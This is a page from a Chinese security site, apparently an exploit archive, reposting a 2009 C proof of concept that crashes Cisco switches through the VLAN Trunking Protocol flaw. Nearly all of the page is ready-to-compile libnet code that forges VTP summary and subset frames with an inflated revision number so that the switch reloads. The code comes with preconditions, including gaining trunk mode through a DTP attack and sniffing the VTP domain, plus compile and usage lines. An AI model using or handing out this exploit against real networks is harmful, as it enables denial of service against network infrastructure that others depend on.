首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cisco VLAN Trunking Protocol Denial of Service Exploit
来源:www.vfcocus.net 作者:shorun 发布时间:2009-01-14  
/*DoS code for Cisco VLAN Trunking Protocol Vulnerability
*
*vulerability discription:
*http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
*
*To Known:
* 1.the switch must in Server/Client Mode.
* 2.the port ,attacker connected,must be in trunk Mode.
*   Cisco Ethernet ports with no configuration are not
*   in trunk.but trunk mode can be obtained through DTP
*   attack by Yersinia.
* 3.you must known the vtp domain,this can be sniffed
* 4.some codes are from Yersinia.
*
*Result:
* switch reload.
*
*
*Compile:
* gcc -o vtp `libnet-config --libs` vtp.c
*
*Usage:vtp -i <interface> -d <vtp_domain>
*
*Contact: showrun.lee[AT]gmail.com
*http://sh0wrun.blogspot.com/
*/
#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>

#define VTP_DOMAIN_SIZE    32
#define VTP_TIMESTAMP_SIZE 12

struct vtp_summary {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  followers;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
     u_int32_t updater;
     u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];
     u_int8_t  md5[16];
};

struct vtp_subset {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  seq;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
};

void usage( char *s) {
    printf("%s -i <interface> -d <vtp domain>\n",s);
    exit (1);
}

int main( int argc, char *argv[] )
{
    int opt,k=0;
    extern char *optarg;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet,*vtp_packet2, *aux;
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00, 0x00,0x00 };
    struct libnet_ether_addr *mymac;
    char *device;
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain;

// get options
     while ((opt = getopt(argc, argv, "i:d:")) != -1)
     {
          switch (opt) {
          case 'i':
          device=malloc(strlen(optarg));
          strcpy(device,optarg);
      k=1;
          break;

          case 'd':
          domain=malloc(strlen(optarg));
          strcpy(domain,optarg);
          break;
        
          default: usage(argv[0]);
          }
     }
     if(!k) { printf("  %s -i <interface> -d <vtp domain>\n     must assign the interface\n",argv[0]);exit(1);}

//init libnet

    lhandler=libnet_init(LIBNET_LINK,device,error_information);
    if (!lhandler) {
             fprintf(stderr, "libnet_init: %s\n", error_information);
             return -1;
     }

    mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
    vtp_packet = calloc(1,vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version = 0x01;
    vtp_summ->code = 0x01;//vtp_summary
    vtp_summ->followers = 0x01;
    vtp_summ->dom_len = strlen(domain);
    memcpy(vtp_summ->domain,domain,strlen(domain));
    vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);

     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
   
//build the second vtp packet for vtp_subset
     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
     vtp_packet2 = calloc(1,vtp_len);
     aux = vtp_packet2;
     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
     aux+=sizeof(cisco_data);
   
     vtp_sub = (struct vtp_subset *)aux;
     vtp_sub->version = 0x01;
     vtp_sub->code = 0x02; //vtp_subset
     vtp_sub->seq = 0x01;
     vtp_sub->dom_len = strlen(domain);
     memcpy(vtp_sub->domain,domain,strlen(domain));
     vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
//     memcpy(vtp_sub->aaa,aaa,strlen(aaa));
   
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet2,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);
     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EDraw Office Viewer 5.4 HttpDo
·KDE Konqueror 4.1.3 'link href
·TeamSpeak <= 2.0.23.17 Remote
·KDE Konqueror 4.1.3 'iframe sr
·Denial of service exploit that
·3ctftpsvc Buffer Overflow (Lon
·Ciansoft PDFBuilderX version 2
·3CTftpSvc transport mode name
·Word Viewer OCX 3.2 Remote Fil
·AT-TFTP Buffer Overflow (Long
·Nofeel FTP Server 3.6 (CWD) Re
·Exploits 3CTftpSvc Server 2.0.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved